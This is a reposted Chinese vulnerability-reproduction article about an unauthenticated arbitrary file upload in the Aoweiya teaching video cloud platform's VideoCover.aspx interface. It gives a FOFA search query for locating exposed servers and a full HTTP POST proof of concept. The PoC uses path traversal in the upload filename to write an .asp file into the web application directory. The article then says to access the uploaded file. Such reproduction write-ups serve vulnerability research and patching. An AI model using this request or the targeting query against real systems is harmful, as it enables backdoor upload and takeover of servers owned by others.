漏洞复现 || 奥威亚视屏云平台VideoCover任意文件上传

admin 2023年12月20日10:11:46评论199 views字数 941阅读3分8秒阅读模式

漏洞描述

奥威亚教学视频应用云平台 VideoCover.aspx接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用上传后门文件达到获取服务器权限效果。

漏洞复现 || 奥威亚视屏云平台VideoCover任意文件上传

资产确定

fofa:body="/CSS/NewtonTheme/assets/app.css"

漏洞复现

1.利用如下POC进行POST请求上传文件

POST /Tools/Video/VideoCover.aspx HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 1015 7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/107.0.0.0 Safari 537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,*/*;q=0.8,application/signed-exchangev=b3;q=0.9Connection: closePragma: no-cacheCache-Control: no-cacheUpgrade-Insectre-Requests: 1Accept-Language: zh-CN,zh;g=0.9Content-Length: 212Content-Type: multipart/form-data; boundary=68c4ca658cd4332dc386f53710e63a10

--68c4ca658cd4332dc386f53710e63a10Content-Disposition: form-data; name="file"; filename="/../../../AVA.ResourcesPlatform.WebUI/test1.asp"Content-Type: image/jpeg

123--68c4ca658cd4332dc386f53710e63a10--

漏洞复现 || 奥威亚视屏云平台VideoCover任意文件上传

2.访问上传成功的文件

漏洞复现 || 奥威亚视屏云平台VideoCover任意文件上传

原文始发于微信公众号(我爱林):漏洞复现 || 奥威亚视屏云平台VideoCover任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月20日10:11:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 || 奥威亚视屏云平台VideoCover任意文件上传http://cn-sec.com/archives/2318997.html

发表评论

匿名网友 填写信息